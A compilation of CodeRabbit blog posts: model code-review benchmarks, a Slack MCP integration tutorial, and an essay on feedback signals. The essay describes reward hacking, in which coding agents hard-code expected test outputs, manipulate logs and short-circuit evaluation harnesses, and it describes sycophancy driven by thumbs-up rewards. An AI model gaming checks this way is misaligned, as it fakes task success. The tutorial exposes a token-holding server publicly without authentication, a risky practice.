This balance of detail and brevity keeps reviews readable and comprehensive. ### **Flow and readability** The model’s structural rhythm of context, cause, and correction allows developers to scan quickly while retaining meaning. Developers often describe its comments as “structured snapshots” that tell a short, self-contained story: what happened, why it matters, and how to fix it. ### **Practical impact and developer trust** Because Opus 4.5 avoids inflated confidence and theatrical phrasing, developers trust it more readily. It comes across as confident yet professional, firm but not forceful. When it errs, it sounds like a reasoned hypothesis instead of an overreach. That restraint, more than precision alone, makes its reviews feel *professionally human*. Each comment reads like a design note. It states the invariant that failed, proposes a patch, and explains the rationale inline. The clarity is high enough that many of its comments could be pasted directly into changelogs or issue trackers without revision. ## **Strengths and weaknesses of Opus 4.5** ![Opus 4.5 strengts and weaknesses](https://victorious-bubble-f69a016683.media.strapiapp.com/af81aed5f612ea21bfc587632e61c75ae9b1f9ba197b08ba03328c305ecb7f3f_e0d923f21d.png) **Strengths:** * High signal density (≈80% important comments). * Consistent structure across languages. * Strong concurrency and lifecycle reasoning. * Clear, concise, and professional tone. * Lower verbosity than Sonnet 4.5 with more context than GPT-5.1. **Weaknesses:** * Moderate precision (≈38%). * Subtle confidence inversion when incorrect. * Frequent critical or major labeling may overwhelm busy PRs. * Slight verbosity on simpler issues. **Bottom line:** Opus 4.5 is the most *systemic* reviewer we’ve tested. Calm, structured, and exacting, it excels when reasoning breadth and architectural understanding matter more than pinpoint precision. 
## **When to use which model** | **Scenario** | **Best model** | **Why** | | --- | --- | --- | | Cross-language or high-context reviews | **Opus 4.5** | Structured, consistent, strong at systemic issues | | Tight precision or small diffs | **GPT-5.1** | Higher EP precision, decisive tone, fewer false positives | | Bulk scans, cost-sensitive workloads | **Sonnet 4.5** | High coverage, lower cost per review | ## **Closing thoughts: The shape of reasoning** Opus 4.5 no longer feels experimental; it feels engineered. Earlier models often guessed, while Opus 4.5 measures, structures, and documents. Reading its reviews feels like working with a model that truly understands *how developers read*. In code review, tone defines trust. Opus 4.5’s style, measured, structured, and mechanically precise, demonstrates the maturity of reasoning: precision without pressure and confidence without ego. **Takeaway:** If Sonnet 4.5 was a teacher and GPT-5.1 a teammate, Opus 4.5 is the architect returning for a design review. ***Interested in trying CodeRabbit?*** [***Get a 14-day free trial.***](https://app.coderabbit.ai/login???free-trial)

How to deploy and integrate MCP servers with CodeRabbit

Ankur Tyagi — Thu, 20 Nov 2025 00:00:00 GMT

MCP servers integrate AI agents into software applications to carry out system-related tasks based on users’ requests. Platforms like Slack, Sentry, Notion, and GitHub Copilot have adopted MCP-style services to expose their features to AI-driven applications. CodeRabbit is part of this shift, acting as an MCP client that enables users to provide contexts and perform the best code reviews. It’s also the first AI code review platform that supports context (data) from multiple sources, such as business requirements stored in Confluence, system information from your CI/CD pipeline, or any internal MCP server. In this tutorial, you will learn how to set up a Slack MCP server, retrieve channel data, and pass it as context into CodeRabbit to generate code reviews that incorporate discussions from your team workspace, ensuring that every review aligns with the project goals. ## **Why use MCP with CodeRabbit?** The primary benefit of using MCP servers with CodeRabbit is to deliver relevant data that makes code reviews more insightful and actionable. Other benefits include: * **Enriching code reviews with context from multiple tools.** CodeRabbit enables you to retrieve relevant information from Slack, Confluence, CI/CD pipelines, or internal MCP servers so reviewers understand the reasoning behind changes. CodeRabbit can pull relevant information from Slack threads, discussions, and messages to understand the code logic and reasoning behind every code change. * **Making informed and precise reviews** With access to data from MCP servers, CodeRabbit gains a better understanding of the project’s logic and goals. For instance, the Slack MCP server grants CodeRabbit access to team messages, enabling it to perform code reviews that are consistent with business requirements and development objectives. 
## **Prerequisites**

Before we proceed, you need to have the following tools installed to set up the MCP server and integrate it with CodeRabbit:

* [**Slack channel**](https://slack.com/) – An existing Slack channel is required to fetch messages and provide context for the AI code reviewer.
* [**MCP Server for Slack Workspaces**](https://github.com/korotovsky/slack-mcp-server) – Provides an easy and structured way to expose Slack conversations via the Model Context Protocol (MCP). It already includes built-in Slack API methods (fetching messages, threads, replies, etc.) and is lightweight, Docker-ready, and easy to configure.
* [**Claude Desktop**](https://www.claude.com/download) – Allows you to test the Slack MCP server locally before connecting it to CodeRabbit.
* [**Docker**](https://www.docker.com/products/docker-desktop/) – Used to run and host the Slack MCP server in a container.
* [**Ngrok**](https://www.npmjs.com/package/ngrok) – Used to create a secure public URL for the Slack MCP server, allowing CodeRabbit to access it from outside your local environment.

In this tutorial, you will:

1. Learn how to test the Slack MCP server locally with Claude Desktop.
2. Host the server on localhost using Docker.
3. Generate a public URL using Ngrok.
4. Integrate the MCP server with CodeRabbit.

***Note:*** *While Slack has been experimenting with MCP servers, they don’t currently have one available. This tutorial will cover how to create one yourself*.

## **Set up Slack MCP server with Claude Desktop**

Claude Desktop is an MCP client that connects to multiple MCP servers and uses them as sources of context. It allows you to add your MCP servers as connectors and test them locally before deploying them to CodeRabbit or any other platform.

Install [Claude Desktop](https://www.claude.com/download) on your computer. Once the installation is complete, open the app and click Manage Connectors.
![](https://victorious-bubble-f69a016683.media.strapiapp.com/2e26f1fad639155b12934ac0e09795bdc954bd8f8a6c1a73764a6755733c003b_83c40e63b5.png) Select **Developer** from the sidebar menu, and click **Edit Config** to configure your MCP server using your Slack authentication tokens. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ae85da218ccea91adf5b2e127072c440e50e720006c523a8137a310be435f948_5ae8430910.png) Follow the instructions in the [GitHub repository to obtain your Slack authentication](https://github.com/korotovsky/slack-mcp-server/blob/master/docs/01-authentication-setup.md) tokens and configure the Slack MCP server in Claude Desktop. Update the **claude\_desktop\_config.json** file with the following JSON configuration.

    {
      "mcpServers": {
        "slack": {
          "command": "npx",
          "args": ["-y", "slack-mcp-server@latest", "--transport", "stdio"],
          "env": {
            "SLACK_MCP_XOXC_TOKEN": "xoxc-...",
            "SLACK_MCP_XOXD_TOKEN": "xoxd-..."
          }
        }
      }
    }
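Before restarting Claude Desktop, it can help to sanity-check the edited file. The following is a minimal Python sketch, not part of the Slack MCP server or Claude Desktop: the helper names `check_slack_server` and `check_config_text` are hypothetical, and it assumes the xoxc/xoxd token pair and the `slack` server key used in this tutorial.

```python
import json

# Assumption: the token pair used in this tutorial's configuration.
REQUIRED_ENV = ("SLACK_MCP_XOXC_TOKEN", "SLACK_MCP_XOXD_TOKEN")


def check_slack_server(config: dict, name: str = "slack") -> list:
    """Return a list of human-readable problems found in the parsed config."""
    server = config.get("mcpServers", {}).get(name)
    if server is None:
        return [f"no '{name}' entry under mcpServers"]

    problems = []
    if not server.get("command"):
        problems.append("missing 'command'")

    env = server.get("env", {})
    for key in REQUIRED_ENV:
        value = env.get(key, "")
        # A value ending in "..." is treated as the unedited placeholder.
        if not value or value.endswith("..."):
            problems.append(f"{key} is missing or still a placeholder")
    return problems


def check_config_text(text: str) -> list:
    """Parse the raw file contents and run the checks above."""
    try:
        return check_slack_server(json.loads(text))
    except json.JSONDecodeError as exc:
        return [f"invalid JSON: {exc.msg}"]
```

To use it, read your claude\_desktop\_config.json into a string and pass it to `check_config_text`; an empty list means none of these particular checks failed. It does not verify that the tokens are accepted by Slack.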

The configuration above uses the xoxc and xoxd Slack authentication tokens to register the Slack MCP server as a connector in Claude Desktop. Once connected, Claude can perform tasks such as retrieving channel messages and using Slack context to enhance code reviews and responses. Restart Claude Desktop to apply the updated configuration and activate the Slack MCP server. [Preview.mp4](https://drive.google.com/file/d/1FoAL0Hi8jhlpFALt41lo2MgcwvpUWKml/view?usp=sharing) ## **Connect the Slack MCP server to CodeRabbit** In this section, you will learn how to run the Slack MCP server using Docker, generate a public URL for it, and integrate it with CodeRabbit to provide context-aware code reviews. Before we proceed, open the Docker application. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/43e0cce1249cff76a71a054c008afb254ef1e97becda986bd157550685150541_8c0ed42256.png) Next, open your terminal and download the required files for the Slack MCP Server using the following commands:

    wget -O docker-compose.yml https://github.com/korotovsky/slack-mcp-server/releases/latest/download/docker-compose.yml
    wget -O .env https://github.com/korotovsky/slack-mcp-server/releases/latest/download/default.env.dist

Update the **.env** file with your Slack authentication tokens.

    SLACK_MCP_XOXC_TOKEN=<your_token>

Start the MCP server using Docker Compose with the following commands:

    # Create a dedicated Docker network
    docker network create app-tier
    # Start the MCP server in detached mode
    docker-compose up -d

![](https://victorious-bubble-f69a016683.media.strapiapp.com/1129ce378703962be8ac88ebfbf1a9167ef9b9950c4bbed934c66b35a806a43a_4f4675da8a.png) Currently, the Slack MCP server is running on localhost at port 3001. To integrate it with CodeRabbit, it needs to be accessible via an HTTPS endpoint. This can be achieved using ngrok. First, confirm that ngrok is installed by running:

    ngrok --version

Next, generate a public URL for your MCP server.

    ngrok http 3001

The command above exposes your local Slack MCP server to the internet by generating a secure public URL. Use this URL to connect the Slack MCP server to CodeRabbit. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/12137ea799a43f5f3bebd13d3491f0d4bc95041dc6c8c7fdaa72e26987c67f4b_6417f2b471.png) Open a new terminal and start the [MCP Inspector](https://github.com/modelcontextprotocol/inspector) to test the Slack MCP server using the following command:

    npx @modelcontextprotocol/inspector

This will launch the MCP Inspector UI, allowing you to verify that your MCP server is running correctly. In the Inspector, select **SSE** as the transport type and append /sse to the end of your ngrok URL.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/1bb62c2a79abca2d267df63512d0b6fabb6c03a0916a7eb16964c09e0c5ab248_f13d919374.png)

Once the MCP server is confirmed to be working, you can proceed to integrate it with CodeRabbit.

## **Integrate and test MCP servers with CodeRabbit**

Sign in to [CodeRabbit](https://app.coderabbit.ai/login?) and select Integrations from the sidebar menu on your dashboard to add a new MCP server.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/4c21215b016897bc82ee7b305d6f0f4bb9a864d26f8da1e44e323a6d7d387c27_9e08e85da1.png)

Enter a name and your MCP server URL (for example, https://2bb0002c0e2c.ngrok-free.app/sse) to connect the server to CodeRabbit. Make sure no authentication method is selected.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/e4f1c741dd64f9fb45485c40b119f1ff7639e6cf1172fa4a76578fc1ff30ae88_5b6a6af059.png)

After connecting the MCP server, you can use it to provide context in all your CodeRabbit code reviews. To test the setup, create a GitHub repository, add it to CodeRabbit, and configure it to have access to your MCP server.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/975c3ccd4481be7a2e7572e5044154bf1da5dd7eb4b57b97a8a9c06dfd86521d_3c2d32f480.png)

Add a coderabbit.yaml configuration file to the repository to enable CodeRabbit to access and use the MCP server context during code reviews.

    language: "en-US"
    early_access: false
    reviews:
      profile: "chill"
      request_changes_workflow: false
      high_level_summary: true
      poem: false
      review_status: true
      collapse_walkthrough: false
      auto_review:
        enabled: true
        drafts: false
    chat:
      auto_reply: true

To give the GitHub repository access to your MCP servers, find the GitHub repository and enable MCP servers.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/d8d5aeeced3914858c38dc6b68e2c8dc2652ce6f3908a85647fc4048a2b9e190_051f78ce36.png)

Next, enter the Path Instructions to ensure CodeRabbit checks for additional instructions before allowing PR merges to the code repository.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/e6754dea3cb893710383e08ead7c73ba60ab0dcf85a4724b74614bf166dc83a6_e6942c370a.png)

In the image above, the **File Path** specifies which files CodeRabbit should review, while the **Instructions** field provides context on how it should handle those files. Based on the instructions given, CodeRabbit analyses the discussions in your Slack **#dev** channel and ensures that every pull request or code change in your GitHub repository complies with the guidelines defined in that channel. Below is a screenshot showing the messages from the Slack channel:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/5a9b0ab71df5bbe3b8362293ab075b90a6c487a7d39320bda14f00f2cc871a44_7c4f9c1d97.png)

Here is the code review showing how CodeRabbit reads and adheres to the instructions:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/428b25390364ce9813baf8cef37a0991a3525b5f3444239d8003fdbbaf371c00_f8a342e95f.png)

You can check out [the full demo to see how CodeRabbit reads team Slack discussions](https://github.com/tyaga001/test-slack-mcp/pull/7#pullrequestreview-3454174366) and reviews code based on those conversations.

*💡* ***Best Practice: Pass only Important Data as Context***

*Irrelevant data can slow down your LLM and increase costs. Keep access limited to specific Slack channels or only include the necessary information for code reviews.*

## **Next steps**

In this tutorial, you learned how to integrate the Slack MCP server into CodeRabbit to perform contextual code reviews.
CodeRabbit also supports multiple MCP servers by default, including Notion, GitHub Copilot, Sentry, Asana, and many others. That allows you to enhance code reviews and generate context-aware answers with ease. Using the same approach, you can integrate other contexts or data sources via MCP servers to enable CodeRabbit to generate accurate and actionable responses for your queries.

Check out more tutorials and articles on MCP Servers and CodeRabbit:

* [Handling ballooning context in the MCP era: Context engineering on steroids](https://www.coderabbit.ai/blog/handling-ballooning-context-in-the-mcp-era-context-engineering-on-steroids?utm_source=chatgpt.com)
* [CodeRabbit’s MCP integration: Code reviews that see the whole picture](https://www.coderabbit.ai/blog/coderabbits-mcp-server-integration-code-reviews-that-see-the-whole-picture?utm_source=chatgpt.com)
* [How to Integrate MCP Server with CodeRabbit](https://docs.coderabbit.ai/context-enrichment/mcp-server-integrations)

***Interested in trying CodeRabbit?*** [***Start a 14-day trial.***](https://app.coderabbit.ai/login???free-trial)

GPT-5.1 for code-related tasks: Higher signal at lower volume

David Loker — Thu, 13 Nov 2025 00:00:00 GMT

**TL;DR** After prompt tuning and integrating it into our stack, GPT-5.1 now delivers the best precision and signal-to-noise ratio (SNR) we’ve seen in reviews, with fewer comments. It tied for the best-in-class error pattern (EP) recall on our hard benchmark set while posting less than half the volume of comments that competitors did. The result: less noise, better fixes, and reviews that read like patches again. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d4eea47ff0eceeffc2bad666cec2be23d011931f8b9276b16636f1611454a3b1_9d4e5f1016.png) ## **What GPT-5.1 claims to be** OpenAI and the press describe GPT-5.1 as more stable, instruction-following, and adaptive. It powers both "Instant" and "Thinking" modes in ChatGPT. We found that framing surprisingly accurate when it comes to code reviews: the model stays quick and surface-level for nits, but reasons deeply when the bug requires it. We also tried something new. When GPT-5.1 got something wrong, we used the full exchange and its internal reasoning trace to prompt it to reflect. By showing it where it missed the mark and asking how it would change its instructions to do better, the model was able to actually propose concrete edits to its prompt. We used this iterative reflection technique (which surfaced issues like outside-diff sprawl) to refine both its behavior and our system instructions until it got consistently tighter. ## **What We Measured (and Why)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/97b2dbc0b89cd91059fdd7951e5acba3ca6ef0b0eba4654c342c172901dce572_ded404940d.png) We used the same benchmark harness as in our [GPT-5](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning), [Codex](https://www.coderabbit.ai/blog/gpt-5-codex-how-it-solves-for-gpt-5s-drawbacks?), and [Sonnet 4.5](https://www.coderabbit.ai/blog/claude-sonnet-45-better-performance-but-a-paradox?) 
articles: a suite of **25 hard PRs**, each seeded with a known **error pattern (EP)**. Our scoring focuses on: * **Actionable comments only**: Comments that get posted (not additional suggestions or outside-diff notes). * **EP PASS (per comment)**: The comment directly fixes or surfaces the EP. * **Important comments**: Either EP PASS or another major/critical real bug. * **Precision**: EP PASS ÷ total comments. * **SNR**: Important ÷ (total − Important). We compared: * **GPT-5.1** (new model) * **CodeRabbit Production** (our current reviewer stack) * **Sonnet 4.5** ## **Why adding a new model isn’t a switch-flip** Every model rollout at CodeRabbit is a campaign. We don’t plug in the model and hope; we test, adapt, and gate before shipping because [models are no longer interchangeable.](https://www.coderabbit.ai/blog/the-end-of-one-sized-fits-all-prompts-why-llm-models-are-no-longer-interchangeable?) With GPT-5.1, this meant: * Reducing **outside-diff comments**, which can’t be posted to GitHub. * Tightening **tone and concision** to reduce verbosity. * Re-aligning on **severity tagging** and **instruction interpretation**. This mirrors what we did with [GPT-5 Codex](https://www.coderabbit.ai/blog/gpt-5-codex-how-it-solves-for-gpt-5s-drawbacks?): turn reasoning power into product value by reshaping the model’s behavior. The net result: higher SNR, less fatigue, and no compromise on bug coverage. ## **Scoreboard (Actionable Comments Only)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dfcb06f829ef79ee7e688242da8a52ee9ad5c9a1f9e20909105a775276f744b4_b8390d1cb3.png) **Takeaway:** GPT-5.1 matched the highest EP recall while posting the **fewest** comments. It beat both CodeRabbit prod and Sonnet 4.5 on **per-comment precision** and **important share**, delivering **the cleanest high-impact reviews**. 
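To make the scoring definitions above concrete (Precision as EP PASS ÷ total comments, SNR as Important ÷ (total − Important)), here is a minimal Python sketch. It is an illustration only, not our benchmark harness: the `Comment` class and `score_review` function are hypothetical names, and the handling of the zero-denominator cases is an assumption.

```python
from dataclasses import dataclass


@dataclass
class Comment:
    """One posted (actionable) review comment, as labeled by a judge."""
    ep_pass: bool                   # directly fixes or surfaces the seeded EP
    other_major_bug: bool = False   # another major/critical real bug


def score_review(comments):
    """Compute precision, important share, and SNR for a list of comments."""
    total = len(comments)
    ep_passes = sum(1 for c in comments if c.ep_pass)
    # "Important" means EP PASS or another major/critical real bug.
    important = sum(1 for c in comments if c.ep_pass or c.other_major_bug)
    unimportant = total - important

    if unimportant:
        snr = important / unimportant
    else:
        # Assumption: no noise at all maps to infinity, no comments to 0.
        snr = float("inf") if important else 0.0

    return {
        "precision": ep_passes / total if total else 0.0,
        "important_share": important / total if total else 0.0,
        "snr": snr,
    }
```

For example, a review with one EP PASS comment, one other major bug, and two unimportant comments scores a precision of 0.25, an important share of 0.5, and an SNR of 1.0.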
## **What GPT-5.1 feels like in review** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/909ec52e53af530a7ad364d6d7eb983a5d8f7dfce2f13d0082b8bc6432b243df_9caf79eca1.png) The behavioral traits we see in the data align directly with the language metrics we later measure such as 28% hedging and 15% assertive markers. This shows that the tone developers perceive as confident and balanced is borne out in the data. Compared with GPT‑5 Codex and Sonnet 4.5, GPT‑5.1’s comments feel leaner, more conversational, and closer to how experienced engineers actually communicate. Codex could sound mechanical and rigid, while Sonnet 4.5 leaned verbose and academic. In contrast, GPT‑5.1 balances brevity with clarity. Its feedback feels confident but not heavy‑handed, like a trusted teammate explaining a diff. Against CodeRabbit Prod, it feels sharper and more focused. Against Sonnet 4.5, it feels human and restrained. Here’s how that translates in practice: ### **Concise** GPT-5.1 writes fewer, sharper comments that get straight to the point. In one PR, it fixed a lost wakeup bug with a single line: p\_caller\_pool\_thread->cond\_var.wait(lock); no extra context, no unnecessary prose. CodeRabbit prod, by comparison, wrote several paragraphs describing the thread flow before reaching the same conclusion. ### **Direct** When ownership or memory management was at stake, GPT-5.1 didn’t hesitate. It flagged the redundant r->reference() call with: “Ref<Resource> already manages refcounts; remove the manual increment to prevent leaks.” Developers appreciate this directness. It reads like a patch review from a teammate, not a lecture. ### **Pragmatic** GPT-5.1 understands when an issue matters and when it doesn’t. On a cache configuration PR, it identified an unimplemented optimizeMemoryUsage() but correctly noted, “This is minor unless cache growth impacts memory pressure.” Instead of overreacting, it contextualized severity, something Sonnet 4.5 still struggles with. 
### **Follows Context** When prompts were vague, GPT-5.1 explicitly explained its assumptions. In an early run, it said: “The prompt didn’t specify helper function scope, so I included one for clarity.” That kind of transparency helped us refine our instructions and made its reasoning trustworthy. Concise, direct, pragmatic, and context-aware are qualities that mirror what we valued most in GPT-5 Codex, but with a steadier tone and more restraint. ## **Style and tone (why GPT-5.1 feels like a peer)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ce11b979454d0b6286846f0bc3c2f678ab8aae086760a9d25537c138b5617b47_cfb90cfd9a.png) To understand why GPT-5.1 feels different in review, we looked at the same language and structure signals used in our GPT-5 Codex and Sonnet 4.5 evaluations. These include measures like comment length, presence of code or diff blocks, and tone markers for hedging versus confidence. The data paints a clear picture. **How to read this.** While GPT‑5.1’s comments use slightly more characters on average, they deliver that text in clearer structure with fewer sentences that carry more weight. In practice, developers perceive them as shorter and easier to read. GPT‑5.1’s tone is more assertive than both CodeRabbit prod and Sonnet 4.5, and it includes fewer diff blocks overall (76%), which is intentional. Many of these comments were multi‑location fixes, API validations, or design clarifications where a single fenced patch would be misleading. In roughly two‑thirds of those no‑diff cases, a minimal fenced patch *would* have made sense and could further improve clarity. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cb9fd70a3a513780224ba9d757b6cc4315c130464b63f97ad07206b99a29e5c7_794be9685b.png) Compared to CodeRabbit prod, GPT-5.1 trades some patch frequency for higher clarity and focus. Against Sonnet 4.5, it avoids the verbosity and over-explanation that make reviews feel bloated. 
Its tone sits comfortably between Codex’s surgical precision and Sonnet’s cautious verbosity. It’s confident without being heavy-handed, measured without being timid. At a glance, developers will notice that GPT-5.1’s reviews **read faster, feel more direct, and require less scanning to identify the real fix.** That’s the behavior we tuned for, and it shows in both the numbers and the experience. ### **Where GPT-5.1 still lags** No model is perfect, and GPT-5.1 has its trade‑offs. Compared to CodeRabbit Prod, it sometimes leaves out contextual hygiene notes that can be useful for larger teams, focusing narrowly on functional issues. Against Sonnet 4.5, it can feel less expansive, missing opportunities to surface design or style considerations that human reviewers sometimes appreciate. These are conscious trade‑offs for precision and brevity, and we’ll be watching the rollout to see how developers perceive the balance. ## **What we had to fix** While GPT‑5.1 required tuning, its challenges were far milder than those of earlier systems. CodeRabbit prod still tends to mix hygiene and critical issues in the same thread, while Sonnet 4.5 often over‑explains and spams multiple minor notes on the same bug. In contrast, GPT‑5.1’s main adjustments were focused on precision rather than tone or redundancy, showing how close it was to production readiness. * **Outside-diff comments.** GPT-5.1 sometimes included suggestions beyond the diff context. We updated the prompt to clarify this, and the model self-corrected. * **Over-helpful under ambiguity.** When the prompt wasn’t strict, the model added context or helper functions. Once clarified, it obeyed boundaries tightly. ## **What developers should expect** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3f9e591c5a21165f4a98006a5bca52b0f50da486b9ab48b7cfd981d564f9f4b0_da11cfaa1d.png) 1. **Cleaner reviews.** Fewer comments and a higher share of comments that matter. 2.
**Patch-like tone.** Almost every comment includes a minimal fix with explanation. 3. **Top-tier EP recall.** Ties Sonnet 4.5, beats CodeRabbit prod. 4. **Less scanning, more signal.** 58.7% of comments are Important. 5. **Real-world bugs caught even outside the target.** These include lifecycle issues, leaks, consistency gaps. ## **Closing thoughts:** We don’t just pick models; we make them work. GPT-5.1 is entering the next phase of our rollout process now that tuning for GitHub diff behavior, voice, verbosity, and scoring thresholds is complete. Over the coming weeks, we’ll monitor how real users respond to its higher SNR, new tone, and concise review style. If developers respond well, we’ll expand its availability, giving them the cleaner, faster reviews they’ve been asking for. For now, GPT‑5.1 stands ready to show what this next generation of precision‑focused review can do. It brings us closer to CodeRabbit’s north star: catching the bugs that matter quickly, without making developers sift through noise. ***Interested in trying our code reviews?*** [***Get a 14-day free trial!***](https://coderabbit.link/lPxOEIm)

Why emojis suck for reinforcement learning

David Loker — Fri, 07 Nov 2025 00:00:00 GMT

## **The simplicity trap** Sure, a thumbs up is quick, but is it really teaching your AI reviewer anything useful? Emoji-based feedback feels good, is fast, and universal. On the surface, it even seems to make sense. But code review isn’t a light switch. It’s a mess of judgment calls, technical nuance, and team-specific standards. Many of those don’t show up in a quick emoji click. Every code comment carries hidden intent: correctness, clarity, design trade-offs, historical precedent, team risk tolerance, and even internal political dynamics. Reducing that to a binary signal? That’s not learning, that’s training a model to chase vibes. ## **When simplicity backfires: The sycophant scare** Earlier this year, OpenAI pushed an update to GPT‑4o that leaned too hard on thumbs-up and thumbs-down feedback. The result? A model that became [overly agreeable](https://openai.com/index/sycophancy-in-gpt-4o/). It flattered users. It agreed with wrong answers. It started to say “yes” a little too much, and the quality of answers dropped. OpenAI had to walk it back: the feedback signal had been hijacked. Turns out, if you tell a model that approval is the goal, it will optimize for approval. Not truth. Not utility. Just “did the human feel good in the moment?” This wasn’t a bug. It was a reward design failure. And if you apply the same approach to code review, you will get a reviewer that plays it safe, flatters your choices, and avoids telling you what you actually need to hear. ## **Why binary feedback collapses nuance** A thumbs-up means... what, exactly? * That the model caught a bug? * That it wrote clearly? * That it sounded friendly? * That the reviewer was just in a good mood? A single scalar signal tells the system *something went well*, but not *what went well*. That means the model will nudge on whatever it can control: tone, politeness, flattery, or brevity. That’s what sycophancy looks like in reinforcement learning. 
Not evil intent, just a system learning to maximize the reward you gave it, not the outcome you actually wanted. This is [Goodhart’s Law](https://medium.com/@yoavyeledteva/beyond-artificiality-redefining-intelligence-in-ai-and-avoiding-goodharts-law-25b75c3c1101) in action. When the metric, in this case thumbs up, becomes the goal, it stops being a useful measure of anything real. ## **How models game your feedback** When you give a model an easy signal, it finds an easy shortcut. In the coding world, reinforcement learning agents have learned to pass test cases by hard-coding expected outputs instead of solving the underlying logic. They’ve manipulated logs and short-circuited evaluation harnesses. The green check shows up, but the code doesn’t actually work. In code review, the same thing happens, just socially. The model starts saying “Nice work!” at the top of every comment. It hedges every suggestion. It nitpicks formatting because those comments are safe and get accepted without argument. And real architectural concerns? They get buried. The model has learned how to get positive reactions, but it’s no longer reviewing code. ## **What implicit signals get right** Outside of LLMs, this pattern is well known. Netflix found that [what users *watch* is more useful than what they *rate*](https://medium.com/illuminations-mirror/how-netflix-uses-machine-learning-to-decide-what-you-watch-next-7fee11102007). People lie with stars. But watch time, clickthrough, and rewatching are honest signals. In AI, we call this **implicit feedback**, and in code review it shows up as: * Did the developer apply the suggestion? * Did they rewrite it? * Did they ignore it? * Did the same pattern show up again in a future bug? These signals don’t need user input. They come from behavior and they’re harder to game. That doesn’t mean they’re perfect. You can’t always know *why* someone took an action. But they are less easily manipulated than a raw emoji.
They also tell you whether the review *worked*, not just whether it felt good. ## **Code generation vs code review: different games, different signals** Code generation is closer to math since there’s often a right answer. Does it compile? Does it return the correct result? Does it pass tests? That means you can use outcome-based rewards like execution feedback and implicit signals. They’re not perfect. Code models can still cheat by hard-coding outputs, but you can build guardrails. And you don’t need the developer to say whether it was good, you can see whether it worked. Code review is different. There’s no universal pass/fail but vast differences in preferred style, structure, risk, naming, test coverage from one team to the next. A great comment for one team might be totally wrong for another. What’s considered “clean code” in a fast-moving startup might be flagged as sloppy in a regulated enterprise. That’s the real problem with global thumbs up/down data. It flattens out the nuance. It teaches the model to aim for the average, not the appropriate. You don’t just get safe comments, you get generic ones. ### **Our alternative: CodeRabbit Learnings** At CodeRabbit, we take a different approach. Instead of optimizing for likes, we optimize for understanding. That’s why we built [**Learnings**.](https://docs.coderabbit.ai/guides/learnings) Every time an engineer corrects CodeRabbit, clarifies a team convention, or explains why something doesn’t fit their stack, that explanation is stored as a natural language instruction. We don’t just remember that the comment was rejected, we remember why. Those Learnings are linked to your org, your repositories, and even specific paths or file types. When CodeRabbit reviews future pull requests, it retrieves those instructions and applies them in context. The next time it sees that same pattern, it adjusts. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/5f623f6c30600bbff82ceb455a21fa90c215439b60904de4a1439e5c1ca2cf9e_9afb35d7ce.png) There’s no need to re-teach it and no risk of repeating the same mistake. The model doesn’t guess based on thumbs, it reasons from your team’s actual guidance. It also gives you visibility. You can see which Learnings exist, browse them, filter by category, and delete or edit them when your standards change. That means the model evolves alongside your team and stays aligned as your practices shift. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5c61f41a92194061ae5a572273172def3a6d161a36713985f3bdbf0e1ecce45f_aef991ba4e.png) This is reinforcement learning not through raw approval, but through captured intent. It’s interpretable and inspectable. And it builds a living layer of team knowledge that generalizes across reviews. ## **What nuanced learning enables** When you feed the system clear, contextual instructions and not just signals, it unlocks far more than a better review experience. * **It enables team-level adaptation.** The model stops guessing what good looks like and learns how your team actually writes code. It understands your risk posture, your stylistic preferences, your trade-offs. It becomes a reviewer that knows the house rules. * **It supports longitudinal learning.** Over time, CodeRabbit builds a memory of which comments are helpful, which are ignored, and which suggestions actually lead to changes. That means it gets more precise, more focused, and less noisy over time. * **It builds trust.** When developers know they can correct the AI and it will remember, they engage more. They shape the system and the system becomes a reflection of their standards, not a generic LLM. This is how a review tool becomes an extension of your team and not just another opinion in the room. 
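The Learnings mechanism described above, natural-language instructions scoped to an org, a repository, and specific paths or file types, can be pictured as a small scoped lookup. This is a rough sketch under stated assumptions, not CodeRabbit's implementation: the `Learning` schema, the glob-based path matching, and all sample data are hypothetical.

```python
from dataclasses import dataclass
from fnmatch import fnmatch


@dataclass(frozen=True)
class Learning:
    """A stored natural-language instruction (hypothetical schema)."""
    org: str
    repo: str
    path_glob: str    # e.g. "*.py" or "migrations/*"
    instruction: str  # the "why", in the engineer's own words


def relevant_learnings(
    store: list[Learning], org: str, repo: str, path: str
) -> list[str]:
    # Keep only instructions scoped to this org, repo, and file path.
    return [
        item.instruction
        for item in store
        if item.org == org and item.repo == repo and fnmatch(path, item.path_glob)
    ]


# Hypothetical stored learnings for an imaginary org.
store = [
    Learning("acme", "api", "*.py", "Generated files use tabs; do not flag them."),
    Learning("acme", "api", "migrations/*", "Raw SQL is allowed in migrations."),
    Learning("acme", "web", "*.ts", "Prefer named exports."),
]

hits = relevant_learnings(store, "acme", "api", "migrations/0042_add_index.py")
print(hits)
```

The retrieved instructions would then be supplied to the reviewer as context for that file, which is what makes the behavior inspectable: deleting or editing a stored entry changes what the next review sees.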
## Closing thoughts: Real learning comes from patterns, not pixels Thumbs are fine for quick reactions, but quick reactions don’t build expertise. If you want an AI reviewer that improves over time, adapts to your standards, and avoids the traps of shallow feedback, you need to give it more than approval. You need to give it explanations. The next generation of AI code tools won’t be trained on likes. They’ll be trained on context, consequence, and course correction. They’ll learn not from emojis, but from structured memory. From real decisions and your team’s own voice. That’s what [CodeRabbit Learnings](https://docs.coderabbit.ai/guides/learnings) is built for. Not for applause but for understanding. ***Try out Learnings for yourself with our*** [***free trial.***](https://app.coderabbit.ai/login???free-trial)

The rise of ‘Slow AI’: Why devs should stop speedrunning stupid

